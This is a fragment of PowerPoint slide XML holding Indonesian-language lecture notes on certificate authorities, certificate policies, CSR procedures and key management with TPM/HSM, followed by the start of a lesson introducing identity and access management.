              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pihak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langkah-langkah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CA root </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Tentukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebutuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, email/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penandatanganan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atribut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perhatian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bidang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SAN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencantumkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain, subdomain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> domain wildcard yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Buat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengajukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> CSR, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otorisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikeluarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang valid.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Siapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>prosedur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>termasuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencabutan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencadangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penghapusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>idealnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cryptoprocessor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> TPM dan HSM.</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61</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40885412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PENGANTAR PELAJARAN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda. Proses yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (IAM). Dalam IAM, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) yang valid yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengharuskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemegang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyerahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>boleh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diketahui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
